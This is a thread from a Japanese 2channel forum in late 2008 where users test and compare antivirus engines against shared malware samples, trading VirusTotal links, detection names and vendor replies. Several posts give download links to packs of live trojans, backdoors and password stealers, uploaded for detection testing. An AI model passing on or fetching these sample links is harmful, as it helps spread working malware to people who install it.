http://www.virustotal.com/analisis/a521c9660f86a65999b5e7027f025430

VirustotalにMcAfee+Artemisが追加
McAfee単体とMcAfee+Artemisでは検出率がかなり違うっぽい
同様にPanda2009もVirustotalでは反応しないウイルスも多い

795 :名無しさん@お腹いっぱい。:2008/11/22(土) 13:56:08
NOD32が珍しすぎるぐらい検出しまくってるな・・・

796 :名無しさん@お腹いっぱい。:2008/11/22(土) 14:14:15
意外とやるなArtemis

797 :名無しさん@お腹いっぱい。:2008/11/22(土) 17:26:46
SymantecとPandaも2009エンジン(Pandaの場合はそれプラスTruPreventもだけど)を適用させればVirustotalではかなり検知力が上がるかも

798 :名無しさん@お腹いっぱい。:2008/11/22(土) 19:16:01
McAfeeの資料によればArtemisで+5%検知率が上がると言ってる。


799 :名無しさん@お腹いっぱい。:2008/11/22(土) 21:32:45
McAfee+ArtemisはSymantecでいうパルスアップデートのMcAfee鯖版かな?
パルスアップデートが「鯖からとりに行く」ならMcAfee+Artemisは「鯖上でスキャンする」という感じ

800 :名無しさん@お腹いっぱい。:2008/11/22(土) 21:51:19
DrWebはいけない子ですか?

801 :名無しさん@お腹いっぱい。:2008/11/22(土) 22:03:50
Artemis関連


●クラウド内のシグネチャでゼロデイ攻撃から防御――マカフィーの新技術

 米国McAfeeは9月8日、同社サーバ内のウイルス・シグネチャ・データベースを用いて顧客PCのセキュリティ・チェックを行う「McAfee Artemis Technology」を発表した
。PCをインターネット上のMcAfeeのサーバと接続し、最新のウイルス・シグネチャとの照合を行いゼロデイ攻撃から同PCを守るというもので、いわゆるクラウド型のセキュリティ技術だと言える。

http://www.computerworld.jp/topics/vs/121269.html

●リアルタイム脅威情報共有技術「Artemis」を発表、McAfee

McAfee は2008年9月8日、コンピュータをウイルス、ワーム、トロイの木馬などの不正プログラムから防護する新たな技術を発表した。
「McAfee Artemis Technology」は、同技術を実装している製品で防護されているコンピュータで疑わしいファイルが検出された場合、リアルタイムでサーバーに接続し、そのファイルが悪質かどうか特定する。
この確認は、数秒で行われる。これにより、従来の定期的なアップデートに加えて、攻撃の発生時からコンピュータユーザーを守ることができる。
この技術は、McAfee の研究者が持つセキュリティノウハウ、ハニーポット、McAfee 製品を利用する数千万台のシステムからのリアルタイム情報など、同社の「Community Threat Intelligence」を生かした保護を実現する。
同社は、「Artemis」の長所について、脅威の発生から防護までの間隔を数時間あるいは数日から数秒に短縮することができ、リアルタイムで防護を実現するダイナミックなインターネットサービス、としている。

http://japan.internet.com/webtech/20080918/9.html

>>799
ファイルからフィンガープリントをとって、クラウド上のデータベースに照会するというやつじゃね

802 :名無しさん@お腹いっぱい。:2008/11/22(土) 22:16:43
>>801
トレンドマイクロも似たような技術で来年3月に提供するとか言ってなかった?

>「McAfee Artemis Technology」は、同技術を実装している製品で防護されているコンピュータで疑わしいファイルが検出された場合、リアルタイムでサーバーに接続し、そのファイルが悪質かどうか特定する。
>この確認は、数秒で行われる。これにより、従来の定期的なアップデートに加えて、攻撃の発生時からコンピュータユーザーを守ることができる。

これはPanda2009にも同じシステムが組まれてるね
他はF-Secureがそうだったっけ?

ところでVirustotalの検出結果があてにならないということだけどこれに該当するのはSymantecとKaspersky?
Virustotal上でSymantecで言えばSONARとパルスアップデートが適用されてる?KasperskyはVirustotal上ではヒューリスティック検出はしないと聞いたことがあるが・・・・

803 :名無しさん@お腹いっぱい。:2008/11/22(土) 22:28:39
>>801
カスペもヒューリスティック検出する。
ただ、VTは2009ではなく7だからヒューリスティックの性能が悪くてあまり目にしない。
2009はヒューリスティックの性能が上がってるから、早く変えてほしい。

ちなみに海外フォーラムで新型ヒューリスティックエンジンのお話が出ていて、正式実装は今年中だそうです。
http://forum.kaspersky.com/index.php?showtopic=86632

804 :803:2008/11/22(土) 22:32:37
ごめん、>>802だった。

805 :名無しさん@お腹いっぱい。:2008/11/22(土) 22:39:26
>>803
どちらにしてもKasperskyは現時点ではVirustotalと実際の検出結果が違うということがあるわけね
Symantecもなんだかそんな感じがする、最近ではウイルス対応速度ではかなり頑張ってるSymantecだけど実際にはVirustotalよりもさらに検出できるかも
VirustotalでSymantecのはいつのエンジン使ってるかだけど

avast!とかBitDefenderはどうなんだろ?

806 :名無しさん@お腹いっぱい。:2008/11/23(日) 00:57:02
http://www.antivirushell.com/

807 :名無しさん@お腹いっぱい。:2008/11/23(日) 02:24:30
http://www.duba.net/
http://www.siteadvisor.com/sites/duba.net?version=2&core_ver=1.0&pip=true&premium=false&client_ver=2.8.304&client_type=IEPlugin&suite=false&aff_id=0&locale=ja-jp&os_ver=5.1.3.0

http://www.jiangmin.com/
http://www.siteadvisor.com/sites/jiangmin.com?version=2&core_ver=1.0&pip=true&premium=false&client_ver=2.8.304&client_type=IEPlugin&suite=false&aff_id=0&locale=ja-jp&os_ver=5.1.3.0

http://www.rising.com.cn/new2008/index.html
http://www.siteadvisor.com/sites/rising.com.cn?version=2&core_ver=1.0&pip=true&premium=false&client_ver=2.8.304&client_type=IEPlugin&suite=false&aff_id=0&locale=ja-jp&os_ver=5.1.3.0


なんか知らんけど中国で大改竄にあってるのか???

ちなみに中華版のキングのHPで拾ったもの
http://www.virustotal.com/analisis/99c3963a40779b334e97f5a6dc343a28

808 :名無しさん@お腹いっぱい。:2008/11/23(日) 02:40:27
http://www.kaspersky.com.cn/
http://www.siteadvisor.com/sites/kaspersky.com.cn?version=2&core_ver=1.0&pip=true&premium=false&client_ver=2.8.304&client_type=IEPlugin&suite=false&aff_id=0&locale=ja-jp&os_ver=5.1.3.0

カスペのサイトまで真っ赤っかとか・・・・

809 :名無しさん@お腹いっぱい。:2008/11/23(日) 02:42:23
ウイルス駆除ツールやらを誤検知してるだけ
ttp://dl.rising.com.cn/DownLoadInfo/2008-04-26/1209209418d46491.shtml
ttp://www.virustotal.com/analisis/5b876ae4568c34a2ca72f3dd38a9d0ef

810 :名無しさん@お腹いっぱい。:2008/11/23(日) 02:44:08
サイトレポート見るとキング以外は危険なリンクのみっぽい

それにしても中華のスキャンサイトから何の気なしにキングやRisingのサイトへ飛んでみたらサイトアドバイザが真っ赤っかで驚いたw

811 :名無しさん@お腹いっぱい。:2008/11/23(日) 02:44:10
記事や掲示板に危険リンクがあるだけで真っ赤判定する真っ赤フィーがあほ

812 :名無しさん@お腹いっぱい。:2008/11/23(日) 02:46:41
>>809
誤検出にしても殆どのベンダーが黒判定のキングのブツはどうかとw

813 :名無しさん@お腹いっぱい。:2008/11/23(日) 07:54:57
virustotalが37エンジンになっているんだが増えたのは何処だろう

814 :名無しさん@お腹いっぱい。:2008/11/23(日) 09:42:28
McAfeeってやる気あるのかないのか、わからんな。オープン戦だけ頑張る感じ

815 :名無しさん@お腹いっぱい。:2008/11/23(日) 09:55:02
>>799
ちょっと違う。

ちなみにSymantec Vision 2008に昼飯を食いにいったのだがサンドイッチだけであまりよくなかったお!
前日のDELLの方がよい飯だと思う(でも受講していないから食えなかった)。日DELLの社長のスピーチ内容があまり変わらないのはワロス

脱線した。そのSymantec Visionでのランチ講義ではSymantecもユーザーの実行EXEのハッシュ収集を(インストール時の許諾にもとづき)2007年からしているとな。
で、Nortonインサイトでユーザー数が(満遍なく)多いハッシュは安全という判断をするらしい(Kasperskyみたいに外部からホワイトリストを買っているかは不明)。


>>802
SONARはともかくパルスアップデートはNORTON2009製品の機能、つまりコンシューマー向けプロダクツなので、サーバー向けとか企業向けに搭載されているかは不明。
コンシューマー向けでもN360にはパルスが入ってないので、ユーザーがヤキモキしている。


816 :名無しさん@お腹いっぱい。:2008/11/23(日) 14:27:49
Virustotalは各ベンダーがエンジン変えてもVirustotal上ではそう簡単にエンジン変えれないのが問題みたいだね
近年エンジンが変わったとすると・・・

AVG:Ewidoエンジンと統合
TrendMicro:アンチスパイウェアエンジンと統合(Virustotal自体は遅くに参加だからVirustotalには影響なし?)
McAfee:Artemisの追加(これもVirustotalに新たに登録されてるから問題なし?)
Symantec:2009エンジン(パルスアップデート)が適用されず
Kaspersky:2009バージョンのヒューリスティックが適用されず
GDATA:KasperskyからBitDefenderに変更

主要ベンダーならこんな感じか?
AntiVirとavast!とBitDefenderとNOD32はエンジン自体は変わってないよね?

817 :名無しさん@お腹いっぱい。:2008/11/23(日) 14:29:35
>>814
最近のMcAfeeは頑張ってると思うぞ

818 :名無しさん@お腹いっぱい。:2008/11/23(日) 15:06:27
>>816
GDATAはBitと同じ検出結果出すことが多いから
切り替わってる模様。

819 :名無しさん@お腹いっぱい。:2008/11/23(日) 15:07:44
>>816
G-DATAに関しては検出名から判断するとすでにBitDefender+Avast!のエンジンになっていると思います。


820 :名無しさん@お腹いっぱい。:2008/11/23(日) 16:47:42
またVirustotal吹っ飛んでない?

821 :名無しさん@お腹いっぱい。:2008/11/23(日) 18:38:41
なんでVT使いたがるの?
とろいし重いし、
必要最低限のソフトでスキャンできれば充分なのに

822 :名無しさん@お腹いっぱい。:2008/11/23(日) 18:40:38
「必要最低限」なんていう主観バリバリな言葉でキリッされてもな

823 :名無しさん@お腹いっぱい。:2008/11/23(日) 19:08:40
Virustotalで一通りのベンダーの検出状況がわかるだろう
そのためのスレだろここは

ただ各ベンダーが2009になっていっせいに検出エンジンが変更されてるからVirustotalはそこまで参考にならないかと
早く2009エンジンに切り替えてくれ

824 :名無しさん@お腹いっぱい。:2008/11/24(月) 02:24:58
>>816にちと訂正
AVGは8.0でヒューリスティック感度が上がってる(これはカスペと同じ感じ)のとあとはアンチルートキットが搭載されてる
ただVirustotalのAVGは既に8.0に変わってるのでVirustotal上では影響なし
BitDefenderも2009で検出エンジン変わったのかな?

それとavast!とBitDefenderのヒューリスティック検出名ってどんな感じ?
BitDefenderはヒューリスティックが強いはずなのにヒューリスティック検出は見たことないような・・・

825 :名無しさん@お腹いっぱい。:2008/11/24(月) 02:34:56
http://depositfiles.com/files/7700714

826 :名無しさん@お腹いっぱい。:2008/11/24(月) 02:46:43
>>825
http://www.virustotal.com/analisis/991ed3d23928ff2123a720c21f139636
http://www.virustotal.com/analisis/6877e90084c78c46be015d76c618263a

827 :名無しさん@お腹いっぱい。:2008/11/24(月) 02:59:24
PandaGlobalProtection2009は両方ともシグネチャ検出

ウイルス発見 : Trj/CI.A 除去 Models_Kids\Models&Kids\3243543363648.exe
ウイルス発見 : Trj/Downloader.MDW 除去 Models&Kids\Pass&Login.exe

828 :名無しさん@お腹いっぱい。:2008/11/25(火) 01:23:17
関連はあるようでないが、住人が結構共通してると思うのでこっちに報告
あやしいファイルを実行するスレ(part1)が完走
緒論あるが、クラウンのスレ立て代行に依頼出してきた テンプレは簡単なのを準備した

829 :名無しさん@お腹いっぱい。:2008/11/25(火) 01:47:29
と言うか、埋める前に「立てて」とか言ってくれないと。
代行の依頼見て思わず立てたよ。

830 :名無しさん@お腹いっぱい。:2008/11/25(火) 02:00:26
たぶん、ゆるゆると最後までゆっくり進行だと思ってのんびり構えてたのね
ラス10くらいで、次いっていい?くらいの流れね。想定では。
それが、のこり20切ったところで突然一気に埋まってしまったのは想定外だった
勝手になり申し訳ナス そして雑スマ

831 : ◆W32/Vael.o :2008/11/26(水) 17:04:24
ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=116
Malware-Pack50

例によってMcAfeeには提出済み

832 :アプロダ”管理”人 ◆HL2fUAyECQ :2008/11/26(水) 17:10:08
>>831
毎度アップロード

乙です

833 :名無しさん@お腹いっぱい。:2008/11/26(水) 18:38:26
>>831
NOD32  2/12
4 IAInstall.exe Win32/Kryptik.CEの亜種 トロイの木馬
a soft.exe Win32/Qhost.NGU トロイの木馬

834 :名無しさん@お腹いっぱい。:2008/11/26(水) 18:47:39
>>831
Rising Internet Security 2009 21.16.15(21.05.22)
0-2: Backdoor.Win32.Bifrose.yyv
5-6: Packer.Win32.Agent.r
a: Backdoor.Win32.Bandok.bi

835 :名無しさん@お腹いっぱい。:2008/11/26(水) 19:20:29
あり?”管理”人氏、前はトリップ違ってなかった?

836 :2323 ◆HL2fUAyECQ :2008/11/26(水) 19:31:09
てす

837 :アプロダ”管理”人 ◆HL2fUAyECQ :2008/11/26(水) 19:38:58
>>835
同じはずだよ。いちいちトリップ見てないから何とも言えないけれどね

838 :名無しさん@お腹いっぱい。:2008/11/26(水) 19:46:59
過去ログみてきたけどトリップ付けてなかったみたいだよ

839 :名無しさん@お腹いっぱい。:2008/11/26(水) 20:02:45
0:Task_Manager.exe
ttp://www.virustotal.com/jp/analisis/591209560a2701d6b1100c87c98db796
1:khpt.exe
ttp://www.virustotal.com/jp/analisis/3b5b6a13268db04c35fe62b4bab2a48f
2:Chat_20Client.exe
ttp://www.virustotal.com/jp/analisis/f18c50e130524668a13a578d2d1bdcd9
3:privacyredeemer.exe
ttp://www.virustotal.com/jp/analisis/50487d1ba3dfbd17c7a73255fe60e175
4:IAInstall.exe
ttp://www.virustotal.com/jp/analisis/c2a0429733bd9a0c83e254b1bbbcdd65
5:Flash-Player-Br2008.exe
ttp://www.virustotal.com/jp/analisis/ff8047bc159abb88a1e6fcbc06aa2066
6:w.exe
ttp://www.virustotal.com/jp/analisis/5b902712e9bafa378210b33d5c373c47
7:xloader.exe
ttp://www.virustotal.com/jp/analisis/c5fffe70d546a926b6ee5d5e82030173
8:imagem0023.scr
ttp://www.virustotal.com/jp/analisis/715453f2b13a59a8f96a1525c53ae3be
9:banner851.gif
ttp://www.virustotal.com/jp/analisis/82bd6a3a5f7fe6cef4e67d3d6157a126
a:soft.exe
ttp://www.virustotal.com/jp/analisis/96ce03a7e889ae9d95922c46a0f856ef
b:xloader1.exe
ttp://www.virustotal.com/jp/analisis/a218c51bf0a7315ca87e5a40f6878d96

840 :名無しさん@お腹いっぱい。:2008/11/26(水) 20:16:03
Virustotalグダグダだな

841 :名無しさん@お腹いっぱい。:2008/11/26(水) 23:43:51
>>831
d
今北産業

カスペ2009
シグネチャ発行時刻 11:15:00

4/12 (1,5,6,8)

Detected virus HEUR:Trojan.Win32.Generic Malware\1\khpt.exe
Detected Trojan program Trojan-Downloader.Win32.Agent.aqpd Malware\5\Flash-Player-Br2008.exe
Detected Trojan program Trojan-Banker.Win32.Banbra.fce Malware\6\w.exe
Detected Trojan program Trojan-Downloader.Win32.Banload.ygm Malware\8\imagem0023.scr

検体提出します。

842 :名無しさん@お腹いっぱい。:2008/11/27(木) 00:47:44
McAfee+Artemisの実力は本物みたいだな
SymantecとKasperskyとPandaも早く2009バージョンを適用させればいいのに
ところでBitDefenderはVirustotal上でヒューリスティック検出する?

BitDefenderは一度だけヒューリスティック検出見たような記憶があるんだけどその検出名が忘れた

843 :名無しさん@お腹いっぱい。:2008/11/27(木) 01:01:04
>>831
PandaGlobalProtection2009
Trj/CI.A Malware\a\soft.exe
ウイルス発見 : Trj/CI.A 除去 Malware\6\w.exe
ウイルス発見 : Trj/Downloader.MDW 除去 Malware\5\Flash-Player-Br2008.exe


khpt.exeとChat_20Client.exeとprivacyredeemer.exeとimagem0023.scrはTryPrevent検出(もしかしたらヒューリスティックで検出?)
TruPrevent検出の場合、ログに出てこないからここで報告するのが大変です・・・

844 :名無しさん@お腹いっぱい。:2008/11/27(木) 01:16:10
>>834>>839を見るとRising2009もVirustotalに反映されてないみたいだな
834の検出結果を見るとRisingもMcAfeeやPandaのような検出システムを導入したのかな?(McAfee+Artemisみたいなの)
Risingは使ったことないのでそこらへんわからん、教えてエロイ人

845 :841:2008/11/27(木) 01:41:26
カスペ

VirusTotalでは検知
a---soft.exe---Backdoor.Win32.Bandok.je
b---xloader1.exe---Trojan-Downloader.Win32.Agent.arqz

カスペからの返事
4---IAInstall.exe_ - Trojan-Downloader.Win32.FraudLoad.vdwj
9---banner851.gif_ - Trojan-PSW.Win32.Sinowal.jc

都合、8/12 (1,3,4,5,6,8,9,a,b) 4つ返事待ち。寝る。

846 :名無しさん@お腹いっぱい。:2008/11/27(木) 01:41:43
今VTスキャンして最新検出結果見たけどガチでPanda2009とRising2009のシグネチャ検出結果が反映されてないな
早くこの現象解決して欲しい、これだと「Virustotalでは反応しないけど実際には検出する」ベンダーが多すぎて参考にならん
一度に多くのアンチウイルス使えないからVirustotalの検出状況は参考になるのに・・・

http://www.virustotal.com/analisis/e5e062cda2b63717cbe216a7f901f726
http://www.virustotal.com/analisis/eba1b3f4617052c1c805909e38612691
http://www.virustotal.com/analisis/176c2ff3136928beeb0a6d9bf3f7bf2d
http://www.virustotal.com/analisis/dbe5878b08abd0a5cdbbd23bab2001d9
http://www.virustotal.com/analisis/c91c2ace0bdee89ec34823f897433769
http://www.virustotal.com/analisis/7f7cb4033d4dd6caf97451a50dafc28d

847 :名無しさん@お腹いっぱい。:2008/11/27(木) 02:10:59
Rising2009の検出エンジンのことについて翻訳エンジン使ってでも調べたがまだ2009はベータ版のみで製品版は出てないみたいだな
検出システムも全然公開してなかった

ただ834見るとRisingには期待できそう

ところでNorton2009の>>831の検出状況はどうですか?
VirustotalではSymantecはあまり良くないけどパルスアップデートと拡張ヒューリスティック効果はあります?

848 :834:2008/11/27(木) 03:24:46
Risingも定義だけ2009用でエンジンは2008なのかもね
virscan.orgのRisingがそうなってた
>>844
これのことかな、でも使ってないよ
Cloud Security
ttp://www.rising.com.cn/2008/cloud/
MD5データベース
ttp://file.ikaka.com/Main/index.shtml


849 :名無しさん@お腹いっぱい。:2008/11/27(木) 05:52:07
>>848
Rising2009に関しては検出エンジンと検出システムが公開されないとちょっとわからんかもね
ま、Panda2009も検出システムの情報公開してるかどうかは微妙だけどPandaほどVirustotalの検出結果があてにならないベンダーはない(もちろん良い意味でだけど)

850 :名無しさん@お腹いっぱい。:2008/11/27(木) 10:28:52
>>842
BitDefenderのヒューリスティック検出名はBehavesLike:〜とかそんな感じだった希ガス

↓こんなのをVTでみたことある
BehavesLike:Trojan.ShellStartup
BehavesLike:Trojan.Downloader
BehavesLike:Win32.SMTP-Mailer
BehavesLike:Win32.Malware

851 :841:2008/11/27(木) 12:28:26
>>831

カスペ2009@7:13:00

>>845を、8/12 (1,4,5,6,8,9,a,b) に訂正。3を除外。
8つは検知済み。


カスペからの返事
2:Chat_20Client.exe

Hello
No malicious software was found in the attached file.

3つ回答待ち。(0,3,7)

852 :名無しさん@お腹いっぱい。:2008/11/27(木) 13:46:51
>>831AVG提出しました。

853 :名無しさん@お腹いっぱい。:2008/11/27(木) 16:34:11
Panda2009の検出挙動について
Panda2009はスキャンする時にPanda鯖に接続してスキャンするようになってる
Panda鯖のオンラインデータベースにアクセスして検出能力を高めるという説明になってる

確かにネットに接続した時と接続しなかった時の検出性能はかなり違う
ちなみに>>831ではネットに接続しなかった場合、soft.exeしか検出できなかった、ネットに接続した場合は>>843の通り
ただし常駐保護機能についてはこの機能がない
できるなら常駐時でもこの機能が搭載して欲しいところ、2010に期待か?

854 :名無しさん@お腹いっぱい。:2008/11/27(木) 16:40:10
ここにPanda2009の検出技術が公開されてるね
ttp://www.pandasecurity.com/usa/about/corporate-news/new-50.htm
翻訳はこっち
ttp://translate.google.co.jp/translate?u=http%3A%2F%2Fwww.pandasecurity.com%2Fusa%2Fhomeusers%2Fsolutions%2Fantivirus%2F&sl=en&tl=ja&hl=ja&ie=UTF-8

855 :名無しさん@お腹いっぱい。:2008/11/27(木) 23:20:37
AntiVir
残り物提出した結果
25197382 banner851.gif 52.5 KB MALWARE
25198369 Chat%20Client.exe 348.51 KB CLEAN
25198370 IAInstall.exe 49.5 KB MALWARE
25198371 khpt.exe 238.11 KB MALWARE
25198372 privacyredeemer.exe 1.59 MB CLEAN
25198373 xloader.exe 9.5 KB MALWARE
25198681 PrivacyRedeemer.exe 616 KB MALWARE

856 :名無しさん@お腹いっぱい。:2008/11/28(金) 01:00:17
http://www16.plala.or.jp/spichilz/2chCloser.zip

857 :名無しさん@お腹いっぱい。:2008/11/28(金) 01:37:23
>>3

858 :名無しさん@お腹いっぱい。:2008/11/28(金) 13:45:08
おお、AntiVir への報告が途絶えてたから心配してたよ。

859 :名無しさん@お腹いっぱい。:2008/11/28(金) 13:46:34
>>856
http://www.virustotal.com/analisis/c00221da4518f818a0b867c3c4db20af

860 :名無しさん@お腹いっぱい。:2008/11/28(金) 14:30:02
>>700

861 :名無しさん@お腹いっぱい。:2008/11/28(金) 15:32:12
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=117
virus
agent1〜4はagent0から切り出した物。

862 :名無しさん@お腹いっぱい。:2008/11/28(金) 16:32:48
>>856
>>861
未対応分をMcAfeeに提出させて頂ました。

863 :名無しさん@お腹いっぱい。:2008/11/28(金) 18:08:09
>>861
NOD32(定義バージョン3467) 4/6
agent0.exe〜agent3.exe Win32/TrojanDownloader.Agent.OMQの亜種 トロイの木馬

864 :名無しさん@お腹いっぱい。:2008/11/28(金) 18:51:19
agent0.exe
http://www.virustotal.com/jp/analisis/6488033e6bef0d942a7e5d329e061bc9
agent1.exe
http://www.virustotal.com/jp/analisis/7bd7b312c9081d17899456f1eac61f67
agent2.exe
http://www.virustotal.com/jp/analisis/e721bf789c35fcb8361ade0745d75c52
agent3.exe
http://www.virustotal.com/jp/analisis/92f9d5d591dbdcc797f5d1e0662e4c51
agent4.exe
http://www.virustotal.com/jp/analisis/fa2b576b746059b0f137f1a567122454
unknown1.exe
http://www.virustotal.com/jp/analisis/6e4903c6da5e3324cf734a06dc4dc1ea

865 :名無しさん@お腹いっぱい。:2008/11/28(金) 19:47:23
MS08-067に関しては本家(笑)Microsoftと
McAfeeが鉄板か…。

866 :名無しさん@お腹いっぱい。:2008/11/28(金) 19:50:58
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=118
virus
中華謹製対日トロイ。trojanの方は実際はたぶんdll。

867 :名無しさん@お腹いっぱい。:2008/11/28(金) 20:17:13
>>866
xrea41.exe
http://www.virustotal.com/jp/analisis/b1d9e6e1ccf5869e64ef896658b1da0e
xrea41t.exe
http://www.virustotal.com/jp/analisis/1e191691422c8706f210dd6da02e0f2c

未対応分をMcAfeeに提出させて頂ました。

868 :名無しさん@お腹いっぱい。:2008/11/28(金) 20:26:14
Rising Internet Security 2009
>>861
スルー
>>866
x41dropper.exe: Trojan.PSW.Win32.OnLineGames.aaaa

869 :名無しさん@お腹いっぱい。:2008/11/28(金) 20:43:58
>>861
agent4以外検出

25199329 agent4.exe 26.67 KB CLEAN


870 :名無しさん@お腹いっぱい。:2008/11/28(金) 20:46:54
>>866
25197040 x41trojan.exe 44 KB CLEAN

871 :841:2008/11/28(金) 21:05:13
カスペ2009
d

>>861
1/6
Detected Trojan program Backdoor.Win32.Agent.utw tane0117\agent1.exe

>>866
スルー

検体提出します。



>>831
7-xloader.exe - Trojan.Win32.Agent.arjw
1-khpt.exe_ - Trojan.Win32.Autoit.hd
0-Task_Manager.exe_ - Trojan.Win32.Autoit.he


New malicious software was found in the attached file.
It's detection will be included in the next update. Thank you for your help.

10/12

3 : privacyredeemer.exeは返事まだなのでフォローしてみるっす。(´・ω・`)ショボーン

872 :名無しさん@お腹いっぱい。:2008/11/28(金) 21:05:21
どのソフトだよw

873 :841=871:2008/11/28(金) 21:24:39
カスペ2009

>>861
5/6に訂正。
Detected virus Worm.Win32.Agent.ls agent0.exe
Detected Trojan program Backdoor.Win32.Agent.utw agent1.exe
Detected virus Rootkit.Win32.Small.em agent2.exe
Detected virus Worm.Win32.Agent.lt agent2.exe
Detected virus Worm.Win32.Agent.lt agent3.exe
Detected virus Worm.Win32.Agent.lt agent4.exe

設定ミスだった。orz

874 :871:2008/11/28(金) 22:17:22
カスペからの返事

>>861 都合、6/6
unknown1.exe_ - Trojan-Downloader.Win32.Agent.asht

>>866 都合 2/2
x41dropper.exe_ - Trojan-GameThief.Win32.OnLineGames.tvej
x41trojan.exe_ - Trojan-GameThief.Win32.OnLineGames.tvej


New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

875 :名無しさん@お腹いっぱい。:2008/11/28(金) 23:35:09
PandaGlobalProtection2009

>>861
agent3.exeはスルー、それ以外は全てヒューリスティック検出

>>866
ウイルス発見 : Trj/CI.A 除去 x41dropper.exe
x41trojan.exeはTruPrevent検出

876 :名無しさん@お腹いっぱい。:2008/11/29(土) 00:07:03
今ノリに乗ってるベンダーはMcAfeeとPandaかな

AntiVirとAVGも相変わらず絶好調だけど
誰かNorton2009の検出結果を報告してくれる人がいればな・・・・
VirustotalのSymantecは確実にあてにならんと思うし

877 :名無しさん@お腹いっぱい。:2008/11/29(土) 00:28:01
avast!意外と優秀だな

878 :名無しさん@お腹いっぱい。:2008/11/29(土) 06:17:10
地味だけど Microsoftもなかなかやるな

879 :名無しさん@お腹いっぱい。:2008/11/29(土) 15:19:57
バスターも地味に頑張ってると思うけどね

このスレ的なランクはこんな感じかな

AntiVir、AVG、Kaspersky、McAfee、Panda>avast!、BitDefender、バスター、Microsoft>>>>>>>>>>>>>>ESET

AntiVirとAVGのフリー組は現役絶好調、avast!とBitも良い感じ
Kasperskyは去年と比べたらかなり落ちた印象、それでも対応速度は速いのでまだまだ頑張ってる
McAfeeとPandaは新エンジンになってから見違えるように成長した、今後も期待
SymantecはNorton2009の実力がわからないのでなんともいえない

ESETは・・・・何やらv4.0が出るみたいだけど期待できる?検出エンジン変わったとか情報ある?

880 :名無しさん@お腹いっぱい。:2008/11/29(土) 15:19:57
Microsoftは一時、Zlob系にやたらすばやく対応してた記憶があるな

881 :名無しさん@お腹いっぱい。:2008/11/29(土) 15:23:37
virustotalがSSLで送るにチャックを入れた時の挙動を大きくかえて来たな

882 :名無しさん@お腹いっぱい。:2008/11/29(土) 15:29:20
ArtemisはAV-Comparativeのレポートだと(ちと古いが)
誤検出が結構あったようだが改善されたんかな?

883 :名無しさん@お腹いっぱい。:2008/11/29(土) 15:32:36
検出率上がると誤検出増えるのは仕方ないと思う
でもSophosみたいなのは勘弁、検出率だってAntiVirほどよくないだろうし

884 :名無しさん@お腹いっぱい。:2008/11/29(土) 15:44:34
>>881
チェックを入れるとアドレスバーが黄色くなって吃驚したが俺だけじゃなかったか

885 :名無しさん@お腹いっぱい。:2008/11/29(土) 16:49:31
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=119
virus
>>861 の更新版。

886 :名無しさん@お腹いっぱい。:2008/11/29(土) 16:58:05
>>885


PandaGlobalProtection2009
全てTruPreventで検出

887 :名無しさん@お腹いっぱい。:2008/11/29(土) 17:06:58
http://www.virustotal.com/jp/analisis/259f3592e3929cd0f2871037680122f5
http://www.virustotal.com/jp/analisis/8105dcb7e9c50929d942e59c841f8187
http://www.virustotal.com/jp/analisis/4cd77ada6df0cd2547eef98bd6768765
http://www.virustotal.com/jp/analisis/4cd77ada6df0cd2547eef98bd6768765
http://www.virustotal.com/jp/analisis/3c4eaa7652404f100b91ef9a8b993a93
http://www.virustotal.com/jp/analisis/08b339178caa605513cf8c88a89bd616

現時間のVirustotalはやたらと混んでるな・・・
うpしたものもしっかり反映されてるかどうか・・・

888 :名無しさん@お腹いっぱい。:2008/11/29(土) 17:57:26
AntiVir
unknown1.exe TR/Crypt.XPACK.Gen [trojan]
agent0.exe  TR/Dropper.Gen [trojan]
残り提出済み

仮想PCのほうに体験版だけど、NIS2009入っているので結果後で乗せときます。

889 :名無しさん@お腹いっぱい。:2008/11/29(土) 18:39:24
NIS2009にて
定義<2008/11/30 18:18:11>〜18:36:41

NISは使い慣れていなくて履歴のコピーがわからんので検出数のみ書きます。
すみません。
>>831
10/12 (1,3,4,5,6,7,8,9,a,b)

>>861
1/6 agent1のみ

>>866
0/2 両方スルー

>>885
1/6 agent1のみ

でした。
設定が間違っているのかな?設定はデフォルトのままです。

890 :名無しさん@お腹いっぱい。:2008/11/29(土) 18:47:06
>>889

McAfee2009と比べて雲行き怪しいですな・・・
SONARとパルスアップデートに期待してたんだが・・・

891 :名無しさん@お腹いっぱい。:2008/11/29(土) 19:57:32
>>885

カスペ2009 17:56:00

5/6

Detected virus Worm.Win32.Agent.lw agent0.exe
Detected virus Rootkit.Win32.Agent.fdc agent2.exe
Detected virus Rootkit.Win32.Agent.fdd agent2.exe
Detected virus Rootkit.Win32.Agent.fdd agent3.exe
Detected virus Rootkit.Win32.Agent.fdd agent4.exe
Detected Trojan program Trojan.Win32.KillAV.ayx agent1.exe


検体提出します。>unknown1.exe

>>879
まあ、カスペはシグネチャの「幅」が狭いというか。
Suspicious,Packerとか、Multi.Packedでパッカー検知もすることになってるんだけれど、これまで検知したのを見たことないし。(笑)
疑わしきは罰せずか?
以上私感。

892 :名無しさん@お腹いっぱい。:2008/11/29(土) 20:03:44
>まあ、カスペはシグネチャの「幅」が狭いというか。

カスペとAntiVir、AVG、avast!のフリー組の違いってそこなんだろうな
AntiVir、avast!、AVGは一日のアップデート回数はカスペと比べて明らかに少ないのにSRIでは上位だしこのスレでも優秀な結果を出す
加えてAntiVirはヒューリスティック強力だしな

893 :名無しさん@お腹いっぱい。:2008/11/29(土) 20:07:35
>>885
未対応分をMcAfeeに提出させて頂ました。

894 :名無しさん@お腹いっぱい。:2008/11/29(土) 20:35:42
>>879
GDATEはこの辺り?
AntiVir、AVG、Kaspersky、McAfee、Panda、GDATE>avast!、BitDefender、バスター、Microsoft>・・・>ESET

895 :名無しさん@お腹いっぱい。:2008/11/29(土) 20:40:01
F-Secureもいれなきゃいけないな、F-SecureとGDATAは他社製エンジンだからどうしてもスルーされがちな傾向があるけど


AntiVir、AVG、Kaspersky、McAfee、Panda、GDATA、F-Secure>avast!、BitDefender、バスター、Microsoft>・・・>ESET>・・・・・・・>ZERO(K7)

K7、AV-Testで成績良くなってるからって調子こきすぎ
で、意気揚々とVirustotalに参戦したが結果はESETよりも悪い
K7の実力なんてこんなもんだろ

896 :891:2008/11/29(土) 21:47:53
>>885
カスペからの返事
unknown1.exe
